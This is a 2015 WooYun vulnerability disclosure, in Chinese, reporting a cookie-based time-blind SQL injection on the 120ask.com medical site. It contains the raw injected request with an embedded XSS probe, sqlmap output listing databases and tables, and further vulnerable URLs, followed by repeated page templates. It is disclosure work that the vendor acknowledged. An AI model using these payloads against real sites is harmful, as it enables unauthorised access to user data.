快速问医生某参数过滤不当存在cookie注入

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146090

漏洞标题：快速问医生某参数过滤不当存在cookie注入

漏洞作者：天地不仁以万物为刍狗

提交时间：2015-10-12 14:09

修复时间：2015-11-29 09:28

公开时间：2015-11-29 09:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-12：细节已通知厂商并且等待厂商处理中
2015-10-15：厂商已经确认，细节仅向厂商公开
2015-10-25：细节向核心白帽子及相关领域专家公开
2015-11-04：细节向普通白帽子公开
2015-11-14：细节向实习白帽子公开
2015-11-29：细节向公众公开

简要描述：

幽暗的街角，宁静的雨夜，是谁在呼唤，仿佛风一般，破碎在梦的彼岸

详细说明：

数据包：

GET /forget_pwd HTTP/1.1
X-Forwarded-For: 8.8.8.8'
Cookie: __jsluid=a8ad89913c0d4004064d4948aff7eb69; andomain=61db1d43d1e4ab88b0fc66715115b95a; ASKSID=if(now()=sysdate()%2Csleep(0)%2C0)/*'XOR(if(now()=sysdate()%2Csleep(0)%2C0))OR'"XOR(if(now()=sysdate()%2Csleep(0)%2C0))OR"*/; HMACCOUNT=3FFF731E72B1C8DA; CNZZDATA30036369=cnzz_eid%3D1553699147-1444573889-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1444573889; Hm_lvt_8e22e0e9f539749531bf6948e1729842=1444574626,1444574626; Hm_lpvt_8e22e0e9f539749531bf6948e1729842=1444574626; CNZZDATA1000001320=1395883615-1444573135-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1444573135; Hm_lvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574626,1444574626,1444574638; Hm_lpvt_7c2c4ab8a1436c0f67383fe9417819b7=1444574638; HMACCOUNT=3FFF731E72B1C8DA; __utmt=1; __utma=266081247.1561387362.1444574626.1444574626.1444574626.1; __utmb=266081247.1.10.1444574626; __utmc=266081247; __utmz=266081247.1444574626.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
X-Requested-With: XMLHttpRequest
Referer: http://a.120ask.com/
Host: a.120ask.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

参数 ASKSID 未过滤导致可注入

两库其中 user_center 库中存在 122 张表

由于时间关系这里就不跑了删除的医生账号表都存在其他的你们看看就成

web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[00:22:31] [INFO] fetching tables for database: 'user_center'
[00:22:31] [INFO] fetching number of tables for database 'user_center'
[00:22:31] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[00:22:31] [WARNING] time-based comparison requires larger statistical model, pl
ease wait..............................
[00:22:35] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
1
[00:23:07] [INFO] adjusting time delay to 1 second due to good response times
22
[00:23:13] [INFO] retrieved: adm
[00:23:55] [ERROR] invalid character detected. retrying..
[00:23:55] [WARNING] increasing time delay to 2 seconds
in_title_1
[00:26:51] [INFO] retrieved: admin_title_2
[00:27:54] [INFO] retrieved: alias_bind_log
[00:31:45] [INFO] retrieved: area_info
[00:34:12] [INFO] retrieved: ask_head
[00:36:12] [INFO] retrieved: base_hospital
[00:39:55] [INFO] retrieved: class_relation
[00:43:51] [INFO] retrieved: doctor_auth_apply
[00:49:11] [INFO] retrieved: doctor_auth_base
[00:50:54] [INFO] retrieved: doctor_auth_t
[00:52:33] [ERROR] invalid character detected. retrying..
[00:52:33] [WARNING] increasing time delay to 3 seconds
ype
[00:54:00] [INFO] retrieved: doctor_auth_type_status
[00:58:41] [INFO] retrieved: doctor_class
[01:01:18] [INFO] retrieved: doctor_del_user
[01:05:23] [INFO] retrieved: doctor_education
[01:09:41] [INFO] retrieved: doctor_ext
[01:11:48] [INFO] retrieved: doctor_fla

漏洞证明：

(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testin
g the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 344 HTTP(s) r
equests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: __jsluid=a8ad89913c0d4004064d4948aff7eb69; andomain=61db1d43d1e4ab8
8b0fc66715115b95a; ASKSID=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (S
ELECT(SLEEP(5)))gusd) AND 'ENhF'='ENhF'XOR(if(now()=sysdate(),sleep(0),0))OR'"XO
R(if(now()=sysdate(),sleep(0),0))OR"/; HMACCOUNT=3FFF731E72B1C8DA; CNZZDATA30036
369=cnzz_eid=1553699147-1444573889-http%3A%2F%2Fwww.acunetix-referrer.com%2F%26n
time=1444573889; Hm_lvt_8e22e0e9f539749531bf6948e1729842=1444574626,1444574626;
Hm_lpvt_8e22e0e9f539749531bf6948e1729842=1444574626; CNZZDATA1000001320=13958836
15-1444573135-http%3A%2F%2Fwww.acunetix-referrer.com%2F|1444573135; Hm_lvt_7c2c4
ab8a1436c0f67383fe9417819b7=1444574626,1444574626,1444574638; Hm_lpvt_7c2c4ab8a1
436c0f67383fe9417819b7=1444574638; HMACCOUNT=3FFF731E72B1C8DA; __utmt=1; __utma=
266081247.1561387362.1444574626.1444574626.1444574626.1; __utmb=266081247.1.10.1
444574626; __utmc=266081247; __utmz=266081247.1444574626.1.1.utmcsr=acunetix-ref
errer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSi
nk(0,"'\"><xsstag>()refdxss")
---
[00:05:06] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[00:05:06] [INFO] fetching database names
[00:05:06] [INFO] fetching number of databases
[00:05:06] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[00:05:06] [INFO] retrieved:
[00:05:06] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
2
[00:05:29] [INFO] retrieved:
[00:05:39] [INFO] adjusting time delay to 2 seconds due to good response times
[00:06:02] [ERROR] invalid character detected. retrying..
[00:06:02] [WARNING] increasing time delay to 3 seconds
info
[00:08:29] [ERROR] invalid character detected. retrying..
[00:08:29] [WARNING] increasing time delay to 4 seconds
rmation_schema
[00:15:57] [INFO] retrieved: user_center
[00:22:11] [ERROR] invalid character detected. retrying..
[00:22:11] [WARNING] increasing time delay to 5 seconds
available databases [2]:
[*] information_schema
[*] user_center
[00:22:12] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\a.120ask.com'
[*] shutting down at 00:22:12

修复方案：

其他几处也包含此cookie参数可注入的地方

http://a.120ask.com/askregsave
http://a.120ask.com/checking/
http://a.120ask.com/user/ajax_checkcode
http://a.120ask.com/user/reg_checking/

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：8

确认时间：2015-10-15 09:27

厂商回复：

漏洞已经确认，近期会安排礼物

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146090

漏洞标题：快速问医生某参数过滤不当存在cookie注入

相关厂商：快速问医生

漏洞作者：天地不仁以万物为刍狗

提交时间：2015-10-12 14:09

修复时间：2015-11-29 09:28

公开时间：2015-11-29 09:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0146090

漏洞标题：快速问医生某参数过滤不当存在cookie注入

相关厂商：快速问医生

漏洞作者： 天地不仁 以万物为刍狗

提交时间：2015-10-12 14:09

修复时间：2015-11-29 09:28

公开时间：2015-11-29 09:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0146090"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：天地不仁以万物为刍狗

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源天地不仁以万物为刍狗@乌云